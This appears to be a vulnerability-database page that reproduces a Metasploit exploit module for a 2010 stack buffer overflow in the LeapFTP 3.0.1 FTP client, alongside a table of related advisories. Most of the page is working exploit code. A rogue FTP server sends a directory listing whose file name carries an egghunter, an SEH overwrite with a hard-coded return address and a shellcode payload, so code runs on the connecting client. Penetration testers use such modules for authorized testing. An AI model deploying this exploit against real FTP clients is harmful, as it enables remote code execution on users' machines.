Lucene search
+L

LeapFTP 3.0.1 Stack Buffer Overflow

🗓️ 12 Oct 2010 00:00:00Reported by corelanc0d3r <[email protected]>, nullthreatType 
metasploit
 metasploit
🔗 www.rapid7.com👁 28 Views

LeapFTP 3.0.1 Buffer Overflow in Clien

Related
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2010-20049
20 Aug 202515:36
attackerkb
circl
Circl
CVE-2010-20049
29 May 201815:50
circl
cnnvd
CNNVD
LeapWare LeapFTP 安全漏洞
20 Aug 202500:00
cnnvd
cve
CVE
CVE-2010-20049
20 Aug 202515:36
cve
cvelist
Cvelist
CVE-2010-20049 LeapFTP < 3.1.x Stack Buffer Overflow
20 Aug 202515:36
cvelist
euvd
EUVD
EUVD-2010-5303
7 Oct 202500:30
euvd
nvd
NVD
CVE-2010-20049
20 Aug 202516:15
nvd
ptsecurity
Positive Technologies
PT-2025-34098 · Undefined · Undefined
20 Aug 202500:00
ptsecurity
redhatcve
RedhatCVE
CVE-2010-20049
22 Aug 202516:35
redhatcve
vulnrichment
Vulnrichment
CVE-2010-20049 LeapFTP < 3.1.x Stack Buffer Overflow
20 Aug 202515:36
vulnrichment
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::FtpServer
  include Msf::Exploit::Remote::Egghunter

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'LeapFTP 3.0.1 Stack Buffer Overflow',
        'Description' => %q{
          This module exploits a buffer overflow in the LeapFTP 3.0.1 client.
          This issue is triggered when a file with a long name is downloaded/opened.
        },
        'Author' => [
          'corelanc0d3r <peter.ve[at]corelan.be>', # Original bug, completed MSF module
          'nullthreat' # Ported PoC to MSF
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2010-20049' ],
          [ 'OSVDB', '68640'],
          [ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ],
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'seh',
        },
        'Payload' => {
          'Space' => 1000,
          'BadChars' => "\x00",
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        'Targets' => [
          [ 'Windows Universal', { 'Offset' => 528, 'Ret' => 0x0042A8A8 } ], # ADD ESP,64, POP EBX, RET :) boy I love pvefindaddr
        ],
        'Privileged' => false,
        'DisclosureDate' => '2010-10-12',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  def setup
    super
  end

  def on_client_unknown_command(c, cmd, arg)
    c.put("200 OK\r\n")
  end

  def on_client_command_list(c, arg)
    conn = establish_data_connection(c)
    if (not conn)
      c.put("425 Can't build data connection\r\n")
      return
    end
    print_status(" - Data connection set up")
    code = 150
    c.put("#{code} Here comes the directory listing.\r\n")
    code = 226
    c.put("#{code} Directory send ok.\r\n")
    # create the egg hunter
    badchars = ""
    eggoptions =
      {
        :checksum => true,
        :eggtag => "W00T"
      }
    hunter, egg = generate_egghunter(payload.encoded, badchars, eggoptions)
    # Get the file ready
    junk = "\x73\x65" # 73 65 = jump over filename = "se"
    junk << "cret admin passwords.txt"
    junk << "_" * ((target['Offset']) - junk.length - hunter.length) # _ = POP EDI
    junk << hunter
    seh = [target.ret].pack('V')
    shellcode = egg + egg + payload.encoded
    junk2 = rand_text_alpha((2000 - shellcode.length))
    payload = junk + seh + shellcode + junk2
    strfile = payload
    print_status(" - Sending directory list via data connection")
    dirlist = "-rw-rw-r--    1 1176     1176         1060 Aug 16 22:22 #{strfile}.txt\r\n"
    conn.put("total 2\r\n" + dirlist)
    conn.close
    return
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation